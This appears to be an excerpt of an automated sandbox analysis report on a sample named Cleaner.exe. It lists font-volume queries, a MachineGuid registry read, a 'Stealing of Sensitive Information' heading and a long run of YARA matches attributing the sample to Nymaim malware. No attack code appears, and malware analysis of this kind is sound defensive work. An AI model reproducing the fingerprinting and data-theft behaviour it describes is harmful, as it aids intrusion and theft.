Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.0.file.exe.21d0e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
